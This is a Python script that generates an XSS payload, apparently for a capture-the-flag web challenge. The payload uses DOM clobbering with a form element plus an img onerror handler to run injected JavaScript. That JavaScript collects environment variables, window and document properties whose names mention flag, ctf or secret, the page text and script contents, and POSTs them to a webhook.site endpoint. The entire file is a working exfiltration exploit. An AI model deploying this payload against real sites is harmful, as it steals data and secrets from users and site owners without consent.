#!/usr/bin/env python3
"""
Check if FLAG might be in environment or accessible via process
"""

import urllib.parse
WEBHOOK = "https://webhook.site/YOUR-WEBHOOK-ID"  # Replace with your webhook

# Try to access process environment from JavaScript (Node.js style, won't work in browser but let's try)
# Also check for any global variables that might have been set
search_code = f"""
(async () => {{
    const data = {{}};
    
    // Try Node.js process (won't work in browser but worth a shot)
    try {{
        if (typeof process !== 'undefined' && process.env) {{
            data.processEnv = process.env;
        }}
    }} catch(e) {{ data.processEnv_error = e.toString(); }}
    
    // Check all globals for 'FLAG' or 'uoftctf'
    const allGlobals = Object.getOwnPropertyNames(window);
    data.allWindowProps = allGlobals.filter(k => 
        k.toLowerCase().includes('flag') || 
        k.toLowerCase().includes('uoft') ||
        k.toLowerCase().includes('ctf') ||
        k.toLowerCase().includes('secret')
    );
    
    // Check document properties
    const allDocProps = Object.getOwnPropertyNames(document);
    data.allDocumentProps = allDocProps.filter(k => 
        k.toLowerCase().includes('flag') || 
        k.toLowerCase().includes('uoft') ||
        k.toLowerCase().includes('ctf')
    );
    
    // Dump entire DOM as text to search for flag pattern
    data.bodyText = document.body.textContent;
    data.allScriptTags = Array.from(document.querySelectorAll('script')).map(s => ({{
        src: s.src,
        text: s.textContent.substring(0, 200)
    }}));
    
    await fetch('{WEBHOOK}', {{
        method: 'POST',
        body: JSON.stringify(data, null, 2)
    }});
}})();
""".replace('\n', ' ')

encoded = urllib.parse.quote(search_code)

payload = f'''<form id="errorReporter"><input name="path" value="data:text/javascript,{encoded}"></form>
<img id="renderConfig" src=x onerror="window.lastRenderError='x';throw new Error()">'''

print(payload)